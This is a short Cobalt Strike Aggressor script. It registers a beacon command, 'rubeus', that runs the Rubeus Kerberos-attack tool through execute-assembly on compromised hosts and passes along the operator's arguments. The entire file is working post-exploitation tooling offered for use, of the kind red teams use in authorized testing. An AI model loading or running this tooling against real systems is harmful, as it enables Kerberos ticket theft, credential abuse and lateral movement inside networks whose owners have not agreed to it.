beacon_command_register("rubeus", "Executes Rubeus assembly",
	"Usage: rubeus [arguments]\n\n" .
	"Uses execute-assembly to run the assembly and takes given arguments\n");
alias rubeus{
	local('$bid $asm $desc @args $argu');
	$bid = $1;
	$desc = "Rubeus";
	@args = @_;
	remove(@args, $bid);
	$argu = join(' ', @args);
	if ($argu eq ""){
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
	}
	else{
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
	}
	bexecute_assembly!($bid, script_resource("exe/Rubeus.exe"), $argu);
}
